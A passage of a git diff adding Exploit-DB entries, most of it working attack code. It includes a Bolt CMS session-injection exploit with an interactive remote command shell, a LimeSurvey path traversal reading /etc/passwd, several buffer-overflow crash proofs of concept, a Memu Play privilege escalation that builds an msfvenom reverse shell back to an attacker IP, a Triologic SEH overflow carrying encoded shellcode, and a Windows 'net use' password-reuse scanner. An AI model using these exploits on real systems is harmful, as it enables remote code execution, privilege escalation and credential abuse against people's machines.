sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text +r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + + +print((r11)[0]) + + + + +Greetz to : all my friends \ No newline at end of file diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt new file mode 100644 index 000000000..bda2a8a0f --- /dev/null +++ b/exploits/php/webapps/48297.txt @@ -0,0 +1,18 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11455 + +# Vulnerability Details +# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey +# that allows an attacker to download arbitrary files. The file manager functionality will also +# delete the file after it is downloaded (if the web service account has permissions to do so), +# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. +Vulnerable Parameter : "path" + + +# POC +https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py new file mode 100755 index 000000000..a91229f95 --- /dev/null +++ b/exploits/windows/dos/48284.py @@ -0,0 +1,35 @@ +# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) +# Discovery by: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe +# Tested Version: 4.2.2.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App + +# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers. + + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Key' +# 6.click 'ok' +# 5.Magic happen :) + + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py new file mode 100755 index 000000000..12369a016 --- /dev/null +++ b/exploits/windows/dos/48285.py @@ -0,0 +1,36 @@ +# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) +# Exploit Author: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: https://www.spotauditor.com/ +# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe +# Tested Version: 5.3.4 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App + +# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, +# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook +# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 +# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms. + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run SpotAuditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Magic happen :) + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py new file mode 100755 index 000000000..ce265c73f --- /dev/null +++ b/exploits/windows/dos/48286.py @@ -0,0 +1,39 @@ +# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) +# Discovery by: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Tested Version: 3.2.0.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App +# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, +# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that +# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing +# software significantly reduces the total cost of network management in enterprise environments by enabling +# IT personnel and systems administrators gather a wide range of information from all the computers in the network without +# installing server-side applications on these computers and create a report of potential problems that were found. + + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run Nsauditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Magic happen :) + + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48287.py b/exploits/windows/dos/48287.py new file mode 100755 index 000000000..01d5a7147 --- /dev/null +++ b/exploits/windows/dos/48287.py @@ -0,0 +1,26 @@ +# Exploit Title: Frigate 3.36 - Denial of Service (PoC) +# Date: 2020-04-05 +# Exploit Author: inter +# Vendor Homepage: http://www.Frigate3.com/ +# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe +# Vulnerable Software: Firgate +# Version: 3.36 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: crash.py +# 2.- Copy content to clipboard +# 3.- Open "Frigate3.exe" +# 4.- Go to "Disk" > Find Computer +# 5.- Paste ClipBoard into the "Computer Name:" field +# 6.- Click on OK +# 7.- Crashed + +#Python "crash.py" Code: + +buffer = "\x41" * 2000 +f = open ("Frigate.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py new file mode 100755 index 000000000..e0a122ff7 --- /dev/null +++ b/exploits/windows/dos/48288.py @@ -0,0 +1,23 @@ +# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.uvnc.com/ +# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 +# Tested Version: 1.2.4.0 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py +#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard +#3.- Open UltraVNC Launcher +#4.- Select "Properties" +#5.- In "Repeater host" Paste Clipboard +#6.- Click on "OK" +#7.- Crashed + +cod = "\x41" * 300 + +f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py new file mode 100755 index 000000000..eee1b4ddc --- /dev/null +++ b/exploits/windows/dos/48290.py @@ -0,0 +1,24 @@ +# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.uvnc.com/ +# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 +# Tested Version: 1.2.4.0 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py +#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard +#3.- Open UltraVNC Launcher +#4.- Select "Properties" +#5.- In "Password" Paste Clipboard +#6.- Click on "OK" +#7.- Click on "Propieties" +#8.- Crashed + +cod = "\x41" * 300 + +f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py new file mode 100755 index 000000000..f926016a6 --- /dev/null +++ b/exploits/windows/dos/48291.py @@ -0,0 +1,22 @@ +# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.uvnc.com/ +# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 +# Tested Version: 1.2.4.0 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py +#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard +#3.- Open UltraVNC Viewer +#4.- In "VNC Server" Paste Clipboard +#5.- Click on "Connect" +#6.- Crashed + +cod = "\x41" * 256 + +f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt new file mode 100644 index 000000000..7155a42ed --- /dev/null +++ b/exploits/windows/dos/48292.txt @@ -0,0 +1,22 @@ +# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.emtec.com +# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe +# Tested Version: 7.25.5 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py +#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard +#3.- Open ZOC Terminal +#4.- Select File > Create SSH Key Files... +#5.- Select "Private key file:" field erease and Paste ClipBoard +#6.- Click on "Create public/private key files..." +#7.- Crashed + +buffer = "\x41" * 2000 +f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt new file mode 100644 index 000000000..f6b3529a0 --- /dev/null +++ b/exploits/windows/local/48283.txt @@ -0,0 +1,70 @@ +# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions +# Discovery by: chuyreds +# Discovery Date: 2020-03-08 +# Vendor Homepage: https://www.memuplay.com/ +# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release +# Tested Version: 7.1.3 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Description: +# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions + +# Prerequisites +# Local, Low privilege access with restart capabilities + +# Details +# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. +# A low privilege account is able to rename the MemuService.exe file located in this same path and replace +# with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. +# While a low privilege user is unable to restart the service through the application, a restart of the +# computer triggers the execution of the malicious file. + +C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" +C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) + BUILTIN\Administradores:(I)(F) + BUILTIN\Usuarios:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) + +Se procesaron correctamente 1 archivos; error al procesar 0 archivos + + +C:\>sc qc MEmuSVC +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: MEmuSVC + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : MEmuSVC + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +# Proof of Concept + +1. Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -lvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.1.130/MemuService.exe and download + +4. Overwrite file and copy malicious .exe. + Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak + Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ + +5. Restart victim machine + +6. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py new file mode 100755 index 000000000..13ca75c29 --- /dev/null +++ b/exploits/windows/local/48293.py @@ -0,0 +1,79 @@ +# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) +# Date: 2020-04-04 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html +# Version: 8 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file called "poc.m3l". +# 2.- Open the Application. +# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK. +# 4.- Click on the bottom-right button that displays an arrow and has written "LIST". +# 5.- Select the file "poc.m3l". +# 6.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread +# Payload size: 512 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72" +buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70" +buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b" +buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64" +buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51" +buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c" +buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" +buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a" +buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71" +buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62" +buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69" +buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" +buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71" +buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" +buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d" +buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" +buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" +buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" +buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" +buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f" +buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" +buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62" +buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50" +buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46" +buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38" +buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d" +buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70" +buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52" +buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43" +buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f" +buf += b"\x75\x4d\x30\x41\x41" + +nseh = "\x71\x41" +seh = "\x41\x4a" + +alignment = "" +alignment += "\x54\x71" # push ebx, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt new file mode 100644 index 000000000..654d0b495 --- /dev/null +++ b/exploits/windows/local/48299.txt @@ -0,0 +1,313 @@ +# Title: Microsoft NET USE win10 - Insufficient Authentication Logic +# Date: 2020-04-04 +# Author: hyp3rlinx +# Vendor: www.microsoft.com +# CVE: N/A + + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows "net use" Command + +Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. +The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. + + +[Vulnerability Type] +Insuffient Password Prompt + + +[CVE Reference] +N/A + + +[Security Issue] +The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account +is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately +we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to +has other vulnerabilities present. + +In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. +The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation. +Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. + +Requirements: +1) Remote system built-in Administrator account is enabled +2) Origination system users account password and the remote system Administrator passwords match (reuse). + +Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. +Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. + +However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. +Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. + +Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections +and try them and if theres password reuse (likely) BOOM automagic logon. + +This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. +When testing make sure to logout then log back in after changing passwords so the environment is clean. + +e.g. + +1) Passwords for both systems are different and remote built-in Administrator account active: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator + +Enter the password for 'Administrator' to connect to '192.168.x.x': +System error 5 has occurred. + +Access is denied. + +2) Passwords for both origination system and remote match: + +C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator +The command completed successfully. + +By the way as a side note DCERPC calls work as well, if both systems happen to have same password. +c:\>getmac /s x.x.x.x /U Administrator + +MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." +Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? + +Expected result: Consistent password dialog box, no matter if passwords match or not. +Actual Result: No prompt for a password if both systems passwords are the same. + +Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. + + +[Exploit/POC] +import os,re,time,signal,sys +from subprocess import * +from multiprocessing import Process + +#By John Page (aka hyp3rlinx) +#Apparition Security +#twitter.com/hyp3rlinx +#----------------------------------- +#When a remote systems built-in Administrator account is enabled and both the remote and the target system +#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. +# +#MountPoints2 and Terminal server client hints in the Windows registry can help us. +#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. +#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) +#MountPoints2 key entries are stored like '##10.2.1.40#c$' +#----------------------------------------------------------- + +BANNER=""" + _ ______________ ___ ____ __ _______ ______ + / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ + / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ + / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ +/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ + + By Hyp3rlinx + ApparitionSec +""" + +DRIVE="X" +FINDME="The command completed successfully." +REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' +REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" +VULN_FOUND=set() +DELAY=2 #Any lower and we may get inaccurate results. +rdp_server_lst=[] + +#Return prior network logons to remote systems. +def mountpoints2(): + mntpoint2_connections=[] + try: + p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + except Exception as e: + print("[!] "+str(e)) + return False + for x in tmp: + idx = x.find("##") + clean = x[idx:] + idx2 = clean.rfind("#") + ip = clean[2:idx2] + ip = re.sub(r"#.*[A-Z,a-z]","",ip) + if ip not in mntpoint2_connections: + mntpoint2_connections.append(ip) + mntpoint2_connections = list(filter(None, mntpoint2_connections)) + p.kill() + return mntpoint2_connections + + +#Terminal server client stores remote server connections. +def rdp_svrs(): + global rdp_server_lst + try: + p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + for key in tmp: + if key.find("Servers")!=-1: + pos = key.rfind("\\") + srv = key[pos + 1:].replace("\r\n","").strip() + rdp_server_lst.append(srv) + p.kill() + except Exception as e: + print("[!] "+str(e)) + return False + return True + + +#Disconnect +def del_vuln_connection(ip): + try: + print("[!] Disconnecting vuln network logon connection.\n") + call(r"net use "+DRIVE+":"+" /del") + except Exception as e: + print("[!] "+str(e)) + + +#Check connection +def chk_connection(ip): + print("[+] Testing: "+ip) + sys.stdout.flush() + cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) + stderr, stdout = cmd.communicate() + if "Reply from" in stderr and "Destination host unreachable" not in stderr: + print("[*] Target up!") + return True + else: + print("[!] Target unreachable :(") + return False + + +#Test vuln +def Test_Password_Reuse(ip): + print("[+] Testing "+ip + " the builtin Administrator account.\n") + sys.stdout.flush() + try: + p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) + err = p.stderr.readlines() + + if err: + e = str(err) + if e.find("error 53")!=-1: + print("[*] Network path not found\n") + return + elif e.find("error 1219")!=-1: + print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") + return + elif e.find("error 85")!=-1: + print("[*] The local device name is already in use.\n") + return + else: + print(e+"\n") + + tmp = p.stdout.read() + + if FINDME in tmp: + print("[*] Password reuse for the built-in Administrator found!") + print("[+] Connected to target: "+ ip) + VULN_FOUND.add(ip+":Administrator") + del_vuln_connection(ip) + p.kill() + except Exception as e: + print("[!] "+str(e)) + + + +#Authenticate +def auth(ip): + action_process = Process(target=Test_Password_Reuse, args=(ip,)) + action_process.start() + action_process.join(timeout=5) + action_process.terminate() + + +if __name__ == "__main__": + + print(BANNER) + print("[+] Windows 'net use' Network Logon Type-3") + print("[+] Insufficient Password Prompt") + print("[+] By hyp3rlinx\n") + + time.sleep(3) + + print("[+] Deleting any existing network logons to start clean.") + + #Make sure no exist sessions already exist. + call(r"net use * /del /y") + sys.stdout.flush() + time.sleep(1) + + + #Grab previous connections from MountPoints2 if any. + rdp_svrs() + svrlst=mountpoints2() + + if svrlst: + svrlst + rdp_server_lst + else: + svrlst = rdp_server_lst + + if not svrlst: + print("[*] No MountPoints2 artifacts found, enter an IP.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + else: + #We have MountPoints2 or RDP Server list IP we can try. + for ip in svrlst: + if chk_connection(ip): + auth(ip) + + time.sleep(DELAY) + + + if len(VULN_FOUND) != 0: + print("[*] Located the following vulnerable systems:") + sys.stdout.flush() + for v in VULN_FOUND: + print("[+] "+v) + else: + print("[+] All previous attempts failed, enter an IP and give it a shot!.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + + + +[POC Video URL] +https://www.youtube.com/watch?v=Je93Neb0k8g + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: February 28, 2020 +MSRC "behavior you are reporting is by design" : March 30, 2020 +April 5, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 083c698cc..ebfba676e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6692,6 +6692,14 @@ id,file,description,date,author,type,platform,port 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows, 